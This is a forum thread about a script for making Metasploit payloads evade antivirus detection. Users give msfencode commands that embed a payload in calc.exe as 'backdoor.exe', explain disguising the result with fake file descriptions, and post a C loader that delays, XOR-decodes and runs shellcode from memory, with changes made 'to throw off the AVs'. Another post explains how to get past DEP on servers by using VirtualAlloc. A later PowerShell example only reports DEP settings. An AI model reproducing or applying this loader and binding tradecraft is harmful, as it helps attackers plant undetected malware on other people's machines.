
Thread: [script] for AV evasion

  1. #51
    Member
    Join Date
    Feb 2010
    Location
    Somewhere in the hell
    Posts
    91

    Default Re: [script] for AV evasion

    @LHYX1,

    First of all, I have tried to bind your script-generated payload with another executable file. However, I do not like the result of the newly bound executable file, as the file description is missing.

    Is it possible to inject your script-generated payload (before it is compiled with gcc) into the executable file with msfencode's -k switch? I think the msfencode method is the most perfect one. Or can we make a change to the msfencode template for that purpose? I have no idea about msfencode, so I raise the question here.

    Samiux

  2. #52
    Junior Member L21ZIFER
    Join Date
    Nov 2011
    Posts
    47

    Default Re: [script] for AV evasion

    @samiux,
    could you tell exactly what the results were? Did the AVs notice anything? Did the bound result even launch, i.e. did the legit part of the .exe (calc.exe, for instance) work?

    Did you test this command?
    ~/rt$ ./msfencode -t exe -x calc.exe -k -o backdoor.exe -e x86/shikata_ga_nai -c 5

    where backdoor.exe is the already stealthy-exe.
    Last edited by L21ZIFER; 04-07-2012 at 04:11 AM.

  3. #53
    Senior Member LHYX1
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @samiux you can add a description and all that stuff to the bound exe file with Resource Hacker, like I said in one of my previous posts.
    And btw, did you try to use IExpress already?
    If you still don't like the result, you can try to get it to work with msfencode, but then you are going to have to adjust the code and so on...
    Or you could write your own tool to accomplish this.
    (\ /)
    ( . .)
    c(")(")

    This is bunny.
    Copy and paste bunny into your signature to help him gain world domination.

  4. #54
    Member
    Join Date
    Feb 2010
    Location
    Somewhere in the hell
    Posts
    91

    Default Re: [script] for AV evasion

    @L21ZIFER,

    LHYX1's generated exe file is not detected by major anti-virus programs so far. His work is great. The msfencode command you mentioned cannot inject his generated exe into calc.exe. By the way, the bound exe file (made with Easy Binder) works great except for the file description.

    @LHYX1,

    I am not very familiar with Windows systems. Can you give me some hints on using IExpress or Easy Binder, as in your previous post? I prefer Easy Binder, thanks. Your work is great, I love it very much.

    Samiux
    Last edited by samiux; 04-07-2012 at 06:38 AM.

  5. #55
    Just burned his ISO
    Join Date
    Dec 2010
    Posts
    1

    Default Re: [script] for AV evasion

    @LHYX1 Many thanks for the script first of all. Tested it and it worked with Win7 and XP.
    The problem is that it does not seem to work with Windows 2008 or Windows 2003, though.
    The exe runs with no issues but occupies one CPU core and then fails.

    Any ideas/thoughts would be much appreciated.

    Cheers,

    Nik

  6. #56
    Senior Member LHYX1
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @npavlidis I don't have Windows 2008 or Windows 2003, so I can't test anything.
    I suppose the metasploit payloads work on these systems if you don't encode them with my script?

    This might have something to do with the decrypting for loops.
    Try changing structure.c to this:
    (I removed the long for loops to throw off the AVs)

    Code:
    #include <stdlib.h>
    #include <stdio.h>
    #include <windows.h>
    #include <time.h>

    /* every %s is a template slot that the generator script fills in */
    int main(){
        char junkA[] = %s;
        unsigned char payload[] = %s;
        char junkB[] = %s;
        unsigned char key = %s;
        unsigned int PAYLOAD_LENGTH = %s;
        int i;
        unsigned char* exec = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
        unsigned char* unpack = (unsigned char*)malloc(PAYLOAD_LENGTH/2);
        int z, y;
        int devide;
        int x = 0;
        time_t start_time, cur_time;

        /* busy-wait for two seconds before touching the payload */
        time(&start_time);
        do
        {
            time(&cur_time);
        }
        while((cur_time - start_time) < 2);

        /* pick the real bytes out of the padded payload array */
        for(i=0; i<PAYLOAD_LENGTH; i++)
        {
            devide = %s
            if(devide == 0)
            {
                unpack[x]=payload[i];
                x++;
            }
        }

        /* single-byte XOR decode into the buffer that is then called */
        for(i=0; i<PAYLOAD_LENGTH/2; i++)
        {
            exec[i]=unpack[i]^key;
        }

        ((void (*)())exec)();

        return 0;
    }
    Try playing a little with this c file and see what you can execute and what you can't execute.
    Last edited by LHYX1; 05-01-2012 at 09:17 AM.

  7. #57
    Junior Member
    Join Date
    Aug 2011
    Posts
    34

    Default Re: [script] for AV evasion

    npavlidis,
    On Windows servers the default DEP policy is OptOut, not OptIn like on Win 7/XP.
    DEP prevents the execution of code stored in memory obtained with the malloc function, therefore you must change the DEP policy or change the function used to store the code. I tried using VirtualAlloc and it worked fine on Windows Server 2003.
    Hope I've helped.
    Sorry about my bad English.
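    The OptIn/OptOut distinction above is something an administrator can verify directly. The following PowerShell script is an added example, not code from this thread or from the script being discussed; it reports the system-wide DEP policy from WMI and the DEP state of one process through kernel32!GetProcessDEPPolicy, and assumes Windows PowerShell 2.0 or later on XP SP3 / Server 2008 or newer.

```powershell
# Added example (not from the thread): show the system DEP policy and whether a
# given process runs with DEP enforced. Assumes the caller may open the process.

# Meaning of Win32_OperatingSystem.DataExecutionPrevention_SupportPolicy
$depPolicyNames = @{
    0 = 'AlwaysOff'   # DEP off for every program
    1 = 'AlwaysOn'    # DEP on for every program, no exceptions possible
    2 = 'OptIn'       # only Windows binaries and opted-in programs (XP/7 default)
    3 = 'OptOut'      # every program except an explicit exception list (Server default)
}

function Get-SystemDepPolicy {
    $os = Get-WmiObject -Class Win32_OperatingSystem
    New-Object PSObject -Property @{
        DepAvailable    = $os.DataExecutionPrevention_Available
        Policy          = $depPolicyNames[[int]$os.DataExecutionPrevention_SupportPolicy]
        Covers32BitApps = $os.DataExecutionPrevention_32BitApplications
        CoversDrivers   = $os.DataExecutionPrevention_Drivers
    }
}

# kernel32!GetProcessDEPPolicy exists from XP SP3 / Vista SP1 / Server 2008 on
Add-Type -Namespace DepCheck -Name Native -MemberDefinition @'
[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool GetProcessDEPPolicy(IntPtr hProcess, out uint lpFlags, out bool lpPermanent);
'@

function Get-ProcessDepState {
    param([int]$ProcessId)
    $proc = Get-Process -Id $ProcessId
    $flags = [uint32]0
    $permanent = $false
    if (-not [DepCheck.Native]::GetProcessDEPPolicy($proc.Handle, [ref]$flags, [ref]$permanent)) {
        $err = [Runtime.InteropServices.Marshal]::GetLastWin32Error()
        throw "GetProcessDEPPolicy failed for PID ${ProcessId} (Win32 error $err)"
    }
    # 64-bit processes always run with DEP on; the flag matters for 32-bit ones
    New-Object PSObject -Property @{
        ProcessId  = $ProcessId
        Name       = $proc.ProcessName
        DepEnabled = [bool]($flags -band 0x1)   # PROCESS_DEP_ENABLE
        Permanent  = $permanent
    }
}

Get-SystemDepPolicy | Format-List
Get-ProcessDepState -ProcessId $PID | Format-List
```

    On a server reporting OptOut, a program that executes from a malloc'd heap buffer will be terminated with a DEP violation unless it was added to the exception list, which is exactly the difference between the XP/7 and Server results reported in this thread.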

  9. #59
    Senior Member LHYX1
    Join Date
    Sep 2010
    Location
    Belgium
    Posts
    127

    Default Re: [script] for AV evasion

    @jnpa123 I did not know that.
    Thanks for the info.

  10. #60
    Just burned his ISO
    Join Date
    May 2012
    Posts
    1

    Default Re: [script] for AV evasion

    I keep getting the same error when trying to run any Meterpreter scripts via a reverse_http session (payload option 7, windows/meterpreter/reverse_http). I get a Meterpreter session, try to run a script (persistence, for example) and get this error:

    "Error in script: NoMethodError undefined method `config' for nil:NilClass"

    Can anyone help me with this issue?
